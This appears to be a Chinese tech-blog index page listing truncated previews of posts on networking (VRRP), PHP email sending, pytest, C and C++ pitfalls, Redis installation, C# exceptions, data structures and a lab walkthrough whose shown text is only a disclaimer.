1、VRRP VRRP(Virtual Router Redundancy Protocol,虚拟路由器冗余协议)既能够实现网关的备份,又能解决多个网关之间互相冲突的问题,从而提高网络可靠性。 2、VRRP技术概述: 通过把几台路由设备联合组成一台虚拟的“路由设备”…...
群控系统服务端开发模式-应用开发-邮件发送工具类
一、邮件发送工具类开发 1、添加框架对应的SDK composer require phpmailer/phpmailer 2、添加工具集 在根目录下extend文件夹下创建Email文件夹,在Email文件夹下添加工具集控制并命名为EmailSender.php <?php /*** 邮件发送工具* User: 龙哥三年风水* Date: …...
pytest 的简单介绍
官方文档:pytest 文档 1. pytest 概述 pytest 是一个功能强大的 Python 测试框架,旨在简化单元测试和功能测试的编写与执行。它不仅支持简单的单元测试,还能进行更复杂的测试,如数据驱动的测试、并发测试等。pytest 支持自动化发…...
:字符串转化函数)
【C语言】库函数常见的陷阱与缺陷(2):字符串转化函数
目录 一、atoi 函数 1.1. 功能与用法 1.2. 陷阱与缺陷 1.2.1. 输入验证不足 1.2.2. 溢出问题 1.3 安全替代 1.4. 代码示例 二、atof 函数 2.1. 功能与用法 2.2. 陷阱与缺陷 2.3. 安全使用建议 2.4. 代码示例 三、strtol 函数 3.1. 功能与用法 3.2. 陷阱与缺陷 …...
【LeetCode每日一题】LeetCode 976.三角形的最大周长
LeetCode 976.三角形的最大周长 题目描述 给定一个包含非负整数的数组 nums,其中每个元素表示一个线段的长度。你需要从中选出三个线段,组成一个三角形,使得三角形的周长最大,并返回这个最大周长。如果无法组成三角形࿰…...
在 Ubuntu 24 上安装 Redis 7.0.15 并配置允许所有 IP 访问
前提条件 一台运行 Ubuntu 24 的服务器拥有 sudo 权限的用户 步骤一:更新系统包 首先,确保系统包是最新的,以避免潜在的依赖问题。 sudo apt update sudo apt upgrade -y步骤二:安装编译 Redis 所需的依赖 Redis 需要一些编译…...
C# 中的异常处理:构建健壮和可靠的程序
C#中的异常处理(Exception Handling)。异常处理是编程中非常重要的一部分,它允许开发者优雅地处理程序运行时可能出现的错误或意外情况。通过有效的异常处理,可以使应用程序更加健壮、可靠,并提供更好的用户体验。以下…...
Prime2_解法二:openssl解密凭据
Prime2_解法二:openssl解密凭据 本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动,您将独自承担全…...
数据结构 ——数状存储的基本概念
数据结构 ——数状存储的基本概念 一、树状存储基本概念 1、 深度(层数):计算一个节点的深度,从根节点算起(从1开始计数),到该节点所经过的节点数(包括此节点)为树的深度…...
【网盘系统】递归删除批量文件、从回收站恢复文件、彻底删除文件
为何需要用到递归? 在网盘系统中,文件的类型分为文件和文件夹两种类型。当我们想要批量删除文件时,不乏其中会包含文件夹,而想要删除这个文件夹,自然其中所包含的文件都要删除,而其中所包含的文件也有可能…...
)
C++ 列表初始化(initializer_list)
列表初始化(initializer_list) 列表初始化是C中的一种语法特性,引入于C11,用于更简单直观地初始化变量、对象或容器。它使用花括号 {},提供了更安全的初始化方式,避免了类型窄化转换等潜在错误。 定义 列表初始化是用花括号 {}…...